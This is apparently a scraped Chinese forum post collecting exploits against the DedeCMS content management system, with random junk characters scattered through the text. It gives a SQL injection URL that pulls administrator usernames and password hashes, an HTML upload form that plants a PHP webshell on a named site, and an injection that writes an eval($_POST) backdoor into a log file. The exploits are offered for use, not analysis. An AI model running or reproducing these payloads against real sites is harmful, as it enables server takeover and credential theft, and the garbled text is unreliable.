# }* F7 f1 i$ M$ L ]% Z+ ` ]织梦(Dedecms) 5.1 feedback_js.php 注入漏洞3 a7 f `6 d, `& V
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''=' E# n) Q0 _8 J( g5 x( H4 `" s7 V: R t% P" i3 ^: K) K; G
, @ Z; h' ~0 u7 V 3 S. p; D% \6 l1 N$ i1 x: K; x- K0 o, `! p
h. d8 B6 A; l# l c7 d+ O6 U# ~8 o4 [$ n ! B+ s* [ P" S4 B1 K5 ^* ]1 p0 r7 P% D1 R1 D
4 ~7 R3 D# l: L3 T' z: i/ p
: l( _) T% e" `* C+ k+ ~
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞 1 w" Q6 M; L d+ \9 c/ X<html> 4 \7 t; w/ J& t4 Z' f& A<head>9 X$ u( b+ J! Z0 q. E- w" L; I
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title> - ]8 h0 f- [+ K4 Y: p1 H5 J, m" c/ `1 E</head> 6 A W7 G3 N2 r<body style="FONT-SIZE: 9pt"> ( _% j0 a$ x p$ h---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br /> 4 V$ w8 u' E) O2 A<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>% P* o9 v7 s3 S
<input type='hidden' name='activepath' value='/data/cache/' />% [5 j H# e! S0 r) g- B& U
<input type='hidden' name='cfg_basedir' value='../../' />8 i n: N5 A' n& s* j# c
<input type='hidden' name='cfg_imgtype' value='php' />$ V& Y4 D- D+ }! N. E0 T2 R
<input type='hidden' name='cfg_not_allowall' value='txt' />* |4 H" M h; R: t
<input type='hidden' name='cfg_softtype' value='php' />' L& Y. `& n. F- C) A
<input type='hidden' name='cfg_mediatype' value='php' />) g" v/ Y5 G) A7 p
<input type='hidden' name='f' value='form1.enclosure' /> C' e8 ~) u% q% G6 D+ i3 Q7 M5 c
<input type='hidden' name='job' value='upload' />. y& e, v, f4 n- d
<input type='hidden' name='newname' value='fly.php' />; r1 h' ?/ ]0 v; H
Select U Shell <input type='file' name='uploadfile' size='25' /> / n& ~! ]* O7 l0 ^9 K' L+ A0 c<input type='submit' name='sb1' value='确定' />( d* @( s/ W4 b A5 _. c: G
</form>+ ?0 |" j6 k4 [8 E3 c& q
<br />It's just a exp for the bug of Dedecms V55...<br />1 D& Z3 c6 h% g
Need register_globals = on...<br /> , b8 V6 A0 V+ K8 f4 i4 V" z) ?4 d2 nFun the game,get a webshell at /data/cache/fly.php...<br />; Z% t) @4 S. y4 R) \' U# i
</body>' p% |% D9 C- T# n# x- w
</html> " S0 @6 x8 _8 R. I! p- j3 L( l+ K6 N8 s" K; v$ \' X9 [
9 I# R: j5 O/ x7 m" j4 [+ U7 B: p6 b+ n, n
4 d# p) k- l- W! K: ]# J9 q% D
* R2 t5 {, k3 X5 A8 V. f
! Z3 i# o+ S% I/ ^* z' x
+ I2 [6 L6 C+ J: k! M/ ]1 C4 n6 i
- N1 W5 z6 `& {2 X1 A
. i- Z% `+ h/ \+ ~7 v, O. |, J - \% l+ o0 g7 C织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞 0 M* f: R. e1 R& Q* V利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。 + w d+ D% C E9 T# o+ w0 M1. 访问网址:$ l2 h7 K, k3 |" }1 R http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?> : s/ t, _* r5 C3 T8 K可看见错误信息 ' v, O; d9 r- U! a ; r( ~: [1 I* W: Z m# ^# z7 O 6 W% v2 R9 f" G2 O/ y- @: e. `2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。 7 a8 A! i M, Eint(3) Error: Illegal double '1024e1024' value found during parsing. e# \- L u2 X4 p9 d+ |0 S
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>7 \8 E0 B) Y0 m8 W$ w4 G f) S